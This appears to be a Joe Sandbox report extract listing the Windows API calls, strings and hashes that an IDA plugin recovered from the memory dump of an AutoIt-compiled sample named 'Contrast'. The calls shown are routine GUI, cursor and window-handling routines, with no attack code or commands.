                                                                                                                                        • DeleteObject.GDI32(?), ref: 0059B0FB
                                                                                                                                        • SelectObject.GDI32(?,?), ref: 0059B101
                                                                                                                                        • DeleteObject.GDI32(?), ref: 0059B106
                                                                                                                                        • SetTextColor.GDI32(?,?), ref: 0059B10C
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0059B116
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1996641542-0
                                                                                                                                        • Opcode ID: ee47eb720e5ebc1e2ba5209fd865988a5eee1ba866957ae953760fc350a4423b
                                                                                                                                        • Instruction ID: 72430947095874d7d4a0612ce95bfd57ce4597de14a53f4c3b9ac0f1b33ecc96
                                                                                                                                        • Opcode Fuzzy Hash: ee47eb720e5ebc1e2ba5209fd865988a5eee1ba866957ae953760fc350a4423b
                                                                                                                                        • Instruction Fuzzy Hash: F0617B71900218AFEF119FA4DC48AAE7FB9FF09320F105115F915AB2E1D7719944DF90
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 005990EA
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 005990FB
                                                                                                                                        • CharNextW.USER32(0000014E), ref: 0059912A
                                                                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0059916B
                                                                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00599181
                                                                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00599192
                                                                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 005991AF
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 005991FB
                                                                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00599211
                                                                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00599242
                                                                                                                                        • _memset.LIBCMT ref: 00599267
                                                                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 005992B0
                                                                                                                                        • _memset.LIBCMT ref: 0059930F
                                                                                                                                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00599339
                                                                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00599391
                                                                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 0059943E
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00599460
                                                                                                                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005994AA
                                                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 005994D7
                                                                                                                                        • DrawMenuBar.USER32(?), ref: 005994E6
                                                                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 0059950E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                        • String ID: 0
                                                                                                                                        • API String ID: 1073566785-4108050209
                                                                                                                                        • Opcode ID: 86dad1588dd2e9733718b23791496c035ee19ca3cd89bae085eb11fb41059995
                                                                                                                                        • Instruction ID: 579de6a408b111a0956fa8574a637379e6e0201fba570be52b32085712505494
                                                                                                                                        • Opcode Fuzzy Hash: 86dad1588dd2e9733718b23791496c035ee19ca3cd89bae085eb11fb41059995
                                                                                                                                        • Instruction Fuzzy Hash: 3AE18D74900209AFDF219F58CC88EEE7FB8FF49710F14815AF925AA290D7708A85DF61
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 00595007
                                                                                                                                        • GetDesktopWindow.USER32 ref: 0059501C
                                                                                                                                        • GetWindowRect.USER32(00000000), ref: 00595023
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00595085
                                                                                                                                        • DestroyWindow.USER32(?), ref: 005950B1
                                                                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 005950DA
                                                                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 005950F8
                                                                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0059511E
                                                                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 00595133
                                                                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00595146
                                                                                                                                        • IsWindowVisible.USER32(?), ref: 00595166
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00595181
                                                                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00595195
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 005951AD
                                                                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 005951D3
                                                                                                                                        • GetMonitorInfoW.USER32(00000000,?), ref: 005951ED
                                                                                                                                        • CopyRect.USER32(?,?), ref: 00595204
                                                                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 0059526F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                        • String ID: ($0$tooltips_class32
                                                                                                                                        • API String ID: 698492251-4156429822
                                                                                                                                        • Opcode ID: baa6ea7a7b993bc744069e08c71bab1594f8b4e1be8df561c2446910ab1b7aba
                                                                                                                                        • Instruction ID: c43140b9e1ca293a17d8c7dbb5fe0008546ecf309a7d78902e7c16baec1f123a
                                                                                                                                        • Opcode Fuzzy Hash: baa6ea7a7b993bc744069e08c71bab1594f8b4e1be8df561c2446910ab1b7aba
                                                                                                                                        • Instruction Fuzzy Hash: A0B19770604701AFDB05DF64C888B6ABFE4BF89300F008A1CF5999B291EB70EC55CB92
                                                                                                                                        APIs
                                                                                                                                        • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0057499C
                                                                                                                                        • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 005749C2
                                                                                                                                        • _wcscpy.LIBCMT ref: 005749F0
                                                                                                                                        • _wcscmp.LIBCMT ref: 005749FB
                                                                                                                                        • _wcscat.LIBCMT ref: 00574A11
                                                                                                                                        • _wcsstr.LIBCMT ref: 00574A1C
                                                                                                                                        • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00574A38
                                                                                                                                        • _wcscat.LIBCMT ref: 00574A81
                                                                                                                                        • _wcscat.LIBCMT ref: 00574A88
                                                                                                                                        • _wcsncpy.LIBCMT ref: 00574AB3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                        • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                        • API String ID: 699586101-1459072770
                                                                                                                                        • Opcode ID: 408e36e3b25c3bae07384246ee2bf1944866489a8c5a24a2530d778713b5e232
                                                                                                                                        • Instruction ID: b74aed839a741b5f3aa08817619007daf1b87ff0c8ae83e8a790112a2b006a98
                                                                                                                                        • Opcode Fuzzy Hash: 408e36e3b25c3bae07384246ee2bf1944866489a8c5a24a2530d778713b5e232
                                                                                                                                        • Instruction Fuzzy Hash: 7941D872604216BBEB14B7749C4BEBF7F6CFF85710F004459F908E6192EB349A01AAA5
                                                                                                                                        APIs
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512C8C
                                                                                                                                        • GetSystemMetrics.USER32(00000007), ref: 00512C94
                                                                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00512CBF
                                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00512CC7
                                                                                                                                        • GetSystemMetrics.USER32(00000004), ref: 00512CEC
                                                                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00512D09
                                                                                                                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00512D19
                                                                                                                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00512D4C
                                                                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00512D60
                                                                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 00512D7E
                                                                                                                                        • GetStockObject.GDI32(00000011), ref: 00512D9A
                                                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00512DA5
                                                                                                                                          • Part of subcall function 00512714: GetCursorPos.USER32(?), ref: 00512727
                                                                                                                                          • Part of subcall function 00512714: ScreenToClient.USER32(005D77B0,?), ref: 00512744
                                                                                                                                          • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000001), ref: 00512769
                                                                                                                                          • Part of subcall function 00512714: GetAsyncKeyState.USER32(00000002), ref: 00512777
                                                                                                                                        • SetTimer.USER32(00000000,00000000,00000028,005113C7), ref: 00512DCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                        • String ID: AutoIt v3 GUI$hZ
                                                                                                                                        • API String ID: 1458621304-3588766029
                                                                                                                                        • Opcode ID: c20bf2dd2832b5aa5a8013ddab4a30c3162707214049469f45690058c00421e2
                                                                                                                                        • Instruction ID: b3dda74d533c4f00f857da97243fd40c46b5ce6f0aeadfdb00a8b18b0080ebe2
                                                                                                                                        • Opcode Fuzzy Hash: c20bf2dd2832b5aa5a8013ddab4a30c3162707214049469f45690058c00421e2
                                                                                                                                        • Instruction Fuzzy Hash: 5AB17D71A0120AAFEB14DFA8CD49BED7FA4FB58315F10462AFA15A72D0DB70A850DF50
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00521821: _memmove.LIBCMT ref: 0052185B
                                                                                                                                        • GetForegroundWindow.USER32(005A0980,?,?,?,?,?), ref: 005304E3
                                                                                                                                        • IsWindow.USER32(?), ref: 005666BB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Foreground_memmove
                                                                                                                                        • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                                        • API String ID: 3828923867-1919597938
                                                                                                                                        • Opcode ID: cd01a73ec46e1503a32ae63fdf2347808f6fa9231a668fd81633ed51f9d7eee3
                                                                                                                                        • Instruction ID: 6cc04094af393cca48af23508c4f7029151a70e9d561dfe57d497ef51eb35c0b
                                                                                                                                        • Opcode Fuzzy Hash: cd01a73ec46e1503a32ae63fdf2347808f6fa9231a668fd81633ed51f9d7eee3
                                                                                                                                        • Instruction Fuzzy Hash: F6D1A130104703EFCB04EF60D4959AABFB5FF95348F104A19F496576A2DB30EA99CB92
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?), ref: 005944AC
                                                                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0059456C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                        • API String ID: 3974292440-719923060
                                                                                                                                        • Opcode ID: 796240a5be76fafd36e9a54932220aae2dbc0e23e6cb719dc11ceb4b65f8803c
                                                                                                                                        • Instruction ID: d58c833e4f668cbaa0f54c6228921db6a44b8e255230f6e6b50837a68371572f
                                                                                                                                        • Opcode Fuzzy Hash: 796240a5be76fafd36e9a54932220aae2dbc0e23e6cb719dc11ceb4b65f8803c
                                                                                                                                        • Instruction Fuzzy Hash: 77A159702146029FDB18EF60C965E6ABFA5FFC9314F144968F8969B2D2DB30EC06CB51
                                                                                                                                        APIs
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 005856E1
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 005856EC
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 005856F7
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00585702
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 0058570D
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 00585718
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 00585723
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 0058572E
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00585739
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 00585744
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 0058574F
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 0058575A
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00585765
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00585770
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0058577B
                                                                                                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00585786
                                                                                                                                        • GetCursorInfo.USER32(?), ref: 00585796
                                                                                                                                        • GetLastError.KERNEL32(00000001,00000000), ref: 005857C1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Cursor$Load$ErrorInfoLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3215588206-0
                                                                                                                                        • Opcode ID: e0403d1ada9b603ecb4bce4a122cb029ce43a8c87ef16f6e086521dddf5ee5cb
                                                                                                                                        • Instruction ID: 2fecbac811bf87c693d08eb7d468c1b1921ee4e62a279f57882b548cd25c902e
                                                                                                                                        • Opcode Fuzzy Hash: e0403d1ada9b603ecb4bce4a122cb029ce43a8c87ef16f6e086521dddf5ee5cb
                                                                                                                                        • Instruction Fuzzy Hash: 8E415270E04319AADB109FBA8C49D6EFEB8EF51B50B10452FE509E7290DAB8A401CF61
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0056B17B
                                                                                                                                        • __swprintf.LIBCMT ref: 0056B21C
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B22F
                                                                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0056B284
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B2C0
                                                                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0056B2F7
                                                                                                                                        • GetDlgCtrlID.USER32(?), ref: 0056B349
                                                                                                                                        • GetWindowRect.USER32(?,?), ref: 0056B37F
                                                                                                                                        • GetParent.USER32(?), ref: 0056B39D
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 0056B3A4
                                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0056B41E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B432
                                                                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0056B458
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056B46C
                                                                                                                                          • Part of subcall function 0053385C: _iswctype.LIBCMT ref: 00533864
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                                                                        • String ID: %s%u
                                                                                                                                        • API String ID: 3744389584-679674701
                                                                                                                                        • Opcode ID: b62d41876f133476dbdc21d151d9a3847546c1a87479330d2ad0ff67b57706d0
                                                                                                                                        • Instruction ID: 1f979c54e93c87807dce808204bf961824222fdaa8f0b40d3a7309a3e67da8f3
                                                                                                                                        • Opcode Fuzzy Hash: b62d41876f133476dbdc21d151d9a3847546c1a87479330d2ad0ff67b57706d0
                                                                                                                                        • Instruction Fuzzy Hash: 8AA1F171204306AFEB14DF24C884BAABFE9FF44355F008A29F999C3191DB30E995CB90
                                                                                                                                        APIs
                                                                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0056BAB1
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BAC2
                                                                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0056BAEA
                                                                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0056BB07
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BB25
                                                                                                                                        • _wcsstr.LIBCMT ref: 0056BB36
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0056BB6E
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BB7E
                                                                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0056BBA5
                                                                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0056BBEE
                                                                                                                                        • _wcscmp.LIBCMT ref: 0056BBFE
                                                                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0056BC26
                                                                                                                                        • GetWindowRect.USER32(00000004,?), ref: 0056BC8F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                        • String ID: @$ThumbnailClass
                                                                                                                                        • API String ID: 1788623398-1539354611
                                                                                                                                        • Opcode ID: 2b5ee09d9f810d03a2e59093bdb3dd1868ad12c3fae729a02e68a876b9c34195
                                                                                                                                        • Instruction ID: bd9c6a3fec60704b50fd94dad51819b396529058fcb8c12a53c07452a73f55dc
                                                                                                                                        • Opcode Fuzzy Hash: 2b5ee09d9f810d03a2e59093bdb3dd1868ad12c3fae729a02e68a876b9c34195
                                                                                                                                        • Instruction Fuzzy Hash: 62815C710042069BEB14DF14D885FAA7FA8FF95314F048569FD89DB0A6DB30DE89CBA1
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000A.00000002.2852366604.0000000000511000.00000020.00000001.01000000.00000007.sdmp, Offset: 00510000, based on PE: true
                                                                                                                                        • Associated: 0000000A.00000002.2852315180.0000000000510000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2852585677.00000000005C6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853227718.00000000005D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000A.00000002.2853320691.00000000005D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_10_2_510000_Contrast.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcsnicmp
                                                                                                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                        • API String ID: 1038674560-1810252412
                                                                                                                                        • Opcode ID: 0bdd8badd575367749ee8c1c5745a4965a68ec0bcc865d83248a69aaa6e4a6e0
                                                                                                                                        • Instruction ID: 236eb57fee77bbb4d236de360086a2092bcd30973adf98a37bf84a3999d2cb31
                                                                                                                                        • Opcode Fuzzy Hash: 0bdd8badd575367749ee8c1c5745a4965a68ec0bcc865d83248a69aaa6e4a6e0
                                                                                                                                        • Instruction Fuzzy Hash: 8B31F63194021AAAEB04FBA0DD4BFAE7FA4BF61354F200128F541F20D2EF656E40C656
                                                                                                                                        APIs
                                                                                                                                        • LoadIconW.USER32(00000063), ref: 0056CBAA
                                                                                                                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0056CBBC
                                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 0056CBD3
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0056CBE8
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0056CBEE
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0056CBFE
                                                                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 0056CC04
                                                                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0056CC25
